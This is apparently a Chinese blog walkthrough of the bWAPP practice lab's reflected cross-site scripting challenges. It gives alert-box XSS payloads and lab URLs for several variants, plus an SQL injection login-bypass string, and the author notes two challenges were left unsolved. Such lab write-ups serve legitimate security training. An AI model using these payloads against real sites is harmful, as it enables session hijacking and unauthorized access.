Bwapp漏洞平台答案全解-A3(第一篇)

2018-03-30 10:17:45 浏览数 (1)

A3 - Cross-Site Scripting (XSS)

*****************跨站脚本******************

跨站的终极思路:输入的东西在页面有回显

3.1-XSS – Reflected (GET)

在用户名输入:密码随便输入

<script>alert(/xss/)</script>

出现一次XSS

在用户名和密码出都输入:

<script>alert(/xss/)</script>

出现两个XSS

3.2-XSS - Reflected (POST)

在用户名输入:密码随便输入

<script>alert(/xss/)</script>

出现一次XSS

在用户名和密码出都输入:

<script>alert(/xss/)</script>

出现两个XSS

3.3-XSS - Reflected (JSON)

漏洞URL:

http://192.168.0.155/bWAPP/xss_json.php?title=';alert(1)//&action=search

3.4-XSS - Reflected (AJAX/JSON)

使用burp抓包,

http://172.16.0.225/bWAPP/xss_ajax_2-2.php?title=<script>alert(1)</script>

3.5-XSS - Reflected (AJAX/XML)

http://172.16.0.225/bWAPP/xss_ajax_1-2.php?title=/bWAPP/xss_ajax_1-2.php?title=<a xmlns:a='http://www.w3.org/1999/xhtml'><a:body onload='alert(1)'/></a>

xmlns是XML Namespaces的缩写

当加载网站的时候执行alert(1)

3.6-XSS - Reflected (Back Button)

本身没有XSS,但是在Referer字段中有

漏洞URL:http://192.168.0.155/bWAPP/xss_back_button.php

点击GO back之后会有

-3.7-XSS - Reflected (Custom Header)

这个实在是没找到跨站点在哪里,找的我尴尬症都犯了,全程抓包没发现,可疑点在这个位置,有玩出来的老铁麻烦留言一下,谢谢

3.8-XSS - Reflected (Eval)

http://172.16.0.225/bWAPP/xss_eval.php?date=alert(1)

直接在evla函数里面,可以直接alert

3.9-XSS - Reflected (HREF)

漏洞URL:

http://172.16.0.225/bWAPP/xss_href-2.php?name=/><script>alert(1)</script>&action=vote

前面的a标签要闭合掉

-3.10-XSS - Reflected (Login Form)

这个没玩出来

补充:这边有个万能密码,但是好像跟XSS没啥关系啊,这个怎么玩很尴尬

' or '1'='1

0 人点赞